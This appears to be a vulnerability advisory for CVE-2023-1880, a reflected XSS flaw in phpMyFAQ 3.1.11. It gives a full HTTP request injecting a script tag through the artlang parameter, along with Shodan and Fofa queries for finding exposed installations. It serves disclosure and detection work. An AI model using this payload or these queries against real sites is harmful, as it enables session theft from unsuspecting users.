| Title | Phpmyfaq v3.1.11 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Unauthenticated attackers can inject malicious JavaScript through the unsanitized artlang parameter in send2friend functionality to steal user session cookies. |
| Remediation | Fixed in 3.1.12 Version. |
| CVSS Score | 6.1 |
| EPSS Score | 0.3857 |
| CVE ID | CVE-2023-1880 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"phpmyfaq" |
| Fofa Query | body="phpmyfaq" |
| Tags | cve2023 cve huntr xss phpmyfaq vuln |
Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the ‘artlang’ parameter is not sanitized.
GET /?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1880.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-1880.pcap
N/AN/A